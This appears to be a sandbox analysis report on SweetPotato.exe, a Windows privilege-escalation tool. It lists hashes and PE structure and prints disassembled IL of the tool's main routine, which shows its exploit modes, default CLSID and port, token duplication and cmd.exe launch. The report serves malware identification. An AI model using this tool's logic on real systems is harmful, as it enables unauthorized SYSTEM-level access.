Suspicious
Suspect

f03a17b69f4c60629ba9b9981c89deb0

PE Executable
|
MD5: f03a17b69f4c60629ba9b9981c89deb0
|
Size: 926.21 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Medium

Hash
 Hash Value
MD5
f03a17b69f4c60629ba9b9981c89deb0
Sha1
5ad186b8cec195383de1d368aa53158cb1145120
Sha256
287f87db7206d01932a38c7971c3b658e5e2fc932dff378c18bff88e215338b1
Sha384
c46a4e6bac2b5351e75f0b691b6b6ad5f626e186eaf0e1e1a61d4b42c7ee81e76e1fe6c0e067f55a32edf7d6b2eb2149
Sha512
112ab3e6024984b1c0eaddcd941f1e0a5f5502a1619169e8eef4798276d6775b77d81725949aca9bcc60b39872595e2103cb57f70e3ac5884ae4d156ead03e20
SSDeep
24576:Hdc8cY5G1FOPjWcjL8TxNYqEv0rODHZ/lpWUmJKfplz7XWu9q:H5cY56OaccTtsWIZ/GUm0fpB7
TLSH
C315F1122BAC4B52EEEE17B8E871204567FFD500609FF38F2E94E5AE664FB104945363

PeID

Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
File Structure
f03a17b69f4c60629ba9b9981c89deb0
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ntapidotnet
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

SweetPotato.exe
Full Name

SweetPotato.exe
EntryPoint

System.Void SweetPotato.Program::Main(System.String[])
Scope Name

SweetPotato.exe
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

SweetPotato
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.6.1
Total Strings

346
Main Method

System.Void SweetPotato.Program::Main(System.String[])
Main IL Instruction Count

250
Main IL

newobj System.Void SweetPotato.Program/<>c__DisplayClass1_0::.ctor() stloc.0 <null> ldloc.0 <null> ldstr 4991D34B-80A1-4291-83B6-3328366B9097 stfld System.String SweetPotato.Program/<>c__DisplayClass1_0::clsId ldloc.0 <null> ldc.i4 6666 stfld System.UInt16 SweetPotato.Program/<>c__DisplayClass1_0::port ldloc.0 <null> ldstr c:\Windows\System32\cmd.exe stfld System.String SweetPotato.Program/<>c__DisplayClass1_0::program ldloc.0 <null> ldnull <null> stfld System.String SweetPotato.Program/<>c__DisplayClass1_0::programArgs ldloc.0 <null> ldc.i4.0 <null> stfld SweetPotato.ExecutionMethod SweetPotato.Program/<>c__DisplayClass1_0::executionMethod ldloc.0 <null> ldc.i4.3 <null> stfld SweetPotato.PotatoAPI/Mode SweetPotato.Program/<>c__DisplayClass1_0::mode ldloc.0 <null> ldc.i4.0 <null> stfld System.Boolean SweetPotato.Program/<>c__DisplayClass1_0::showHelp ldc.i4.0 <null> stloc.1 <null> ldstr SweetPotato by @_EthicalChaos_ Orignal RottenPotato code and exploit by @foxglovesec Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery PrintSpoofer discovery and original exploit by @itm4n EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam call System.Void System.Console::WriteLine(System.String) newobj System.Void Mono.Options.OptionSet::.ctor() ldstr c=|clsid= ldstr CLSID (default BITS: 4991D34B-80A1-4291-83B6-3328366B9097) ldloc.0 <null> ldftn System.Void SweetPotato.Program/<>c__DisplayClass1_0::<Main>b__0(System.String) newobj System.Void System.Action`1<System.String>::.ctor(System.Object,System.IntPtr) call Mono.Options.OptionSet Mono.Options.OptionSet::Add<System.String>(System.String,System.String,System.Action`1<System.String>) ldstr m=|method= ldstr Auto,User,Thread (default Auto) ldloc.0 <null> ldftn System.Void SweetPotato.Program/<>c__DisplayClass1_0::<Main>b__1(SweetPotato.ExecutionMethod) newobj System.Void System.Action`1<SweetPotato.ExecutionMethod>::.ctor(System.Object,System.IntPtr) callvirt Mono.Options.OptionSet Mono.Options.OptionSet::Add<SweetPotato.ExecutionMethod>(System.String,System.String,System.Action`1<SweetPotato.ExecutionMethod>) ldstr p=|prog= ldstr Program to launch (default cmd.exe) ldloc.0 <null> ldftn System.Void SweetPotato.Program/<>c__DisplayClass1_0::<Main>b__2(System.String) newobj System.Void System.Action`1<System.String>::.ctor(System.Object,System.IntPtr) callvirt Mono.Options.OptionSet Mono.Options.OptionSet::Add(System.String,System.String,System.Action`1<System.String>) ldstr a=|args= ldstr Arguments for program (default null) ldloc.0 <null> ldftn System.Void SweetPotato.Program/<>c__DisplayClass1_0::<Main>b__3(System.String) newobj System.Void System.Action`1<System.String>::.ctor(System.Object,System.IntPtr) callvirt Mono.Options.OptionSet Mono.Options.OptionSet::Add(System.String,System.String,System.Action`1<System.String>) ldstr e=|exploit= ldstr Exploit mode [DCOM|WinRM|EfsRpc|PrintSpoofer(default)] ldloc.0 <null> ldftn System.Void SweetPotato.Program/<>c__DisplayClass1_0::<Main>b__4(SweetPotato.PotatoAPI/Mode) newobj System.Void System.Action`1<SweetPotato.PotatoAPI/Mode>::.ctor(System.Object,System.IntPtr) callvirt Mono.Options.OptionSet Mono.Options.OptionSet::Add<SweetPotato.PotatoAPI/Mode>(System.String,System.String,System.Action`1<SweetPotato.PotatoAPI/Mode>) ldstr l=|listenPort= ldstr COM server listen port (default 6666) ldloc.0 <null> ldftn System.Void SweetPotato.Program/<>c__DisplayClass1_0::<Main>b__5(System.UInt16) newobj System.Void System.Action`1<System.UInt16>::.ctor(System.Object,System.IntPtr) callvirt Mono.Options.OptionSet Mono.Options.OptionSet::Add<System.UInt16>(System.String,System.String,System.Action`1<System.UInt16>) ldstr h|help ldstr Display this help ldloc.0 <null> ldftn System.Void SweetPotato.Program/<>c__DisplayClass1_0::<Main>b__6(System.String) newobj System.Void System.Action`1<System.String>::.ctor(System.Object,System.IntPtr) callvirt Mono.Options.OptionSet Mono.Options.OptionSet::Add(System.String,System.String,System.Action`1<System.String>) stloc.2 <null> ldloc.2 <null> ldarg.0 <null> callvirt System.Collections.Generic.List`1<System.String> Mono.Options.OptionSet::Parse(System.Collections.Generic.IEnumerable`1<System.String>) pop <null> ldloc.0 <null> ldfld System.Boolean SweetPotato.Program/<>c__DisplayClass1_0::showHelp brfalse.s IL_012D: leave.s IL_014B ldloc.2 <null> call System.Void SweetPotato.Program::PrintHelp(Mono.Options.OptionSet) leave IL_035C: ret leave.s IL_014B: nop stloc.3 <null> ldstr [!] Failed to parse arguments: {0} ldloc.3 <null> callvirt System.String System.Exception::get_Message() call System.Void System.Console::WriteLine(System.String,System.Object) ldloc.2 <null> call System.Void SweetPotato.Program::PrintHelp(Mono.Options.OptionSet) leave IL_035C: ret nop <null> newobj System.Void SweetPotato.Program/<>c__DisplayClass1_1::.ctor() stloc.s V_4 ldloc.s V_4 ldloc.0 <null> stfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldc.i4.s 28 call System.Boolean SweetPotato.ImpersonationToken::EnablePrivilege(SweetPotato.ImpersonationToken/SecurityEntity) stloc.s V_5 ldc.i4.1 <null> call System.Boolean SweetPotato.ImpersonationToken::EnablePrivilege(SweetPotato.ImpersonationToken/SecurityEntity) stloc.s V_6 ldc.i4.3 <null> call System.Boolean SweetPotato.ImpersonationToken::EnablePrivilege(SweetPotato.ImpersonationToken/SecurityEntity) pop <null> ldloc.s V_5 brtrue.s IL_018A: ldloc.s V_4 ldloc.s V_6 brtrue.s IL_018A: ldloc.s V_4 ldstr [!] Cannot perform interception, necessary privileges missing. Are you running under a Service account? call System.Void System.Console::WriteLine(System.String) leave IL_035C: ret ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldfld SweetPotato.ExecutionMethod SweetPotato.Program/<>c__DisplayClass1_0::executionMethod brtrue.s IL_01BC: ldloc.s V_4 ldloc.s V_5 brfalse.s IL_01AB: ldloc.s V_6 ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldc.i4.1 <null> stfld SweetPotato.ExecutionMethod SweetPotato.Program/<>c__DisplayClass1_0::executionMethod br.s IL_01BC: ldloc.s V_4 ldloc.s V_6 brfalse.s IL_01BC: ldloc.s V_4 ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldc.i4.2 <null> stfld SweetPotato.ExecutionMethod SweetPotato.Program/<>c__DisplayClass1_0::executionMethod ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldfld SweetPotato.PotatoAPI/Mode SweetPotato.Program/<>c__DisplayClass1_0::mode ldc.i4.3 <null> bne.un.s IL_01EB: ldloc.s V_4 ldstr [+] Attempting NP impersonation using method PrintSpoofer to launch ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldfld System.String SweetPotato.Program/<>c__DisplayClass1_0::program call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) br IL_0289: ldloc.s V_4 ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldfld SweetPotato.PotatoAPI/Mode SweetPotato.Program/<>c__DisplayClass1_0::mode ldc.i4.2 <null> bne.un.s IL_0217: ldstr "[+] Attempting {0} with CLID {1} on port {2} using method {3} to launch {4}" ldstr [+] Attempting NP impersonation using method EfsRpc to launch ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldfld System.String SweetPotato.Program/<>c__DisplayClass1_0::program call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) br.s IL_0289: ldloc.s V_4 ldstr [+] Attempting {0} with CLID {1} on port {2} using method {3} to launch {4} ldc.i4.5 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldloc.1 <null> brtrue.s IL_022E: ldstr "NTLM Auth" ldstr DCOM NTLM interception br.s IL_0233: stelem.ref ldstr NTLM Auth stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldfld System.String SweetPotato.Program/<>c__DisplayClass1_0::clsId stelem.ref <null> dup <null> ldc.i4.2 <null> ldloc.1 <null> brtrue.s IL_0256: ldc.i4 5985 ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldfld System.UInt16 SweetPotato.Program/<>c__DisplayClass1_0::port br.s IL_025B: box System.Int32 ldc.i4 5985 box System.Int32 stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldfld SweetPotato.ExecutionMethod SweetPotato.Program/<>c__DisplayClass1_0::executionMethod box SweetPotato.ExecutionMethod stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldfld System.String SweetPotato.Program/<>c__DisplayClass1_0::program stelem.ref <null> call System.Void System.Console::WriteLine(System.String,System.Object[]) ldloc.s V_4 ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldfld System.String SweetPotato.Program/<>c__DisplayClass1_0::clsId newobj System.Void System.Guid::.ctor(System.String) ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldfld System.UInt16 SweetPotato.Program/<>c__DisplayClass1_0::port ldloc.s V_4 ldfld SweetPotato.Program/<>c__DisplayClass1_0 SweetPotato.Program/<>c__DisplayClass1_1::CS$<>8__locals1 ldfld SweetPotato.PotatoAPI/Mode SweetPotato.Program/<>c__DisplayClass1_0::mode newobj System.Void SweetPotato.PotatoAPI::.ctor(System.Guid,System.UInt16,SweetPotato.PotatoAPI/Mode) stfld SweetPotato.PotatoAPI SweetPotato.Program/<>c__DisplayClass1_1::potatoAPI ldloc.s V_4 ldfld SweetPotato.PotatoAPI SweetPotato.Program/<>c__DisplayClass1_1::potatoAPI callvirt System.Boolean SweetPotato.PotatoAPI::Trigger() brtrue.s IL_02DB: ldstr "[+] Intercepted and authenticated successfully, launching program" ldstr [!] No authenticated interception took place, exploit failed call System.Void System.Console::WriteLine(System.String) leave IL_035C: ret ldstr [+] Intercepted and authenticated successfully, launching program call System.Void System.Console::WriteLine(System.String) ldloc.s V_4 ldfld SweetPotato.PotatoAPI SweetPotato.Program/<>c__DisplayClass1_1::potatoAPI callvirt System.IntPtr SweetPotato.PotatoAPI::get_Token() ldsfld System.UInt32 SweetPotato.ImpersonationToken::TOKEN_ALL_ACCESS ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.1 <null> ldc.i4.1 <null> ldloc.s V_4 ldflda System.IntPtr SweetPotato.Program/<>c__DisplayClass1_1::impersonatedPrimary call System.Boolean SweetPotato.ImpersonationToken::DuplicateTokenEx(System.IntPtr,System.UInt32,System.IntPtr,SweetPotato.ImpersonationToken/SECURITY_IMPERSONATION_LEVEL,SweetPotato.ImpersonationToken/TOKEN_TYPE,System.IntPtr&) brtrue.s IL_0317: ldloc.s V_4 ldstr [!] Failed to impersonate security context token call System.Void System.Console::WriteLine(System.String) leave.s IL_035C: ret ldloc.s V_4 ldftn System.Void SweetPotato.Program/<>c__DisplayClass1_1::<Main>b__7() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) dup <null> callvirt System.Void System.Threading.Thread::Start() callvirt System.Void System.Threading.Thread::Join() leave.s IL_035C: ret stloc.s V_7 ldstr [!] Failed to exploit COM: {0} ldloc.s V_7 callvirt System.String System.Exception::get_Message() call System.Void System.Console::WriteLine(System.String,System.Object) ldloc.s V_7 callvirt System.String System.Exception::get_StackTrace() callvirt System.String System.Object::ToString() call System.Void System.Console::WriteLine(System.String) leave.s IL_035C: ret ret <null>
f03a17b69f4c60629ba9b9981c89deb0 (926.21 KB)
File Structure
f03a17b69f4c60629ba9b9981c89deb0
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ntapidotnet
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙